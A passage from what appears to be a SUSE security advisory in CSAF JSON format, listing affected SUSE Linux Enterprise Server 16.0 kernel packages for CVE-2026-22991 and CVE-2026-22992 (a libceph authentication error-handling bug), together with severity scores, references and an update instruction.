"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22991"
},
{
"cve": "CVE-2026-22992",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22992"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: return the handler error from mon_handle_auth_done()\n\nCurrently any error from ceph_auth_handle_reply_done() is propagated\nvia finish_auth() but isn\u0027t returned from mon_handle_auth_done(). This\nresults in higher layers learning that (despite the monitor considering\nus to be successfully authenticated) something went wrong in the\nauthentication phase and reacting accordingly, but msgr2 still trying\nto proceed with establishing the session in the background. In the\ncase of secure mode this can trigger a WARN in setup_crypto() and later\nlead to a NULL pointer dereference inside of prepare_auth_signature().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22992",
"url": "https://www.suse.com/security/cve/CVE-2026-22992"
},
{
"category": "external",
"summary": "SUSE Bug 1257218 for CVE-2026-22992",
"url": "https://bugzilla.suse.com/1257218"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
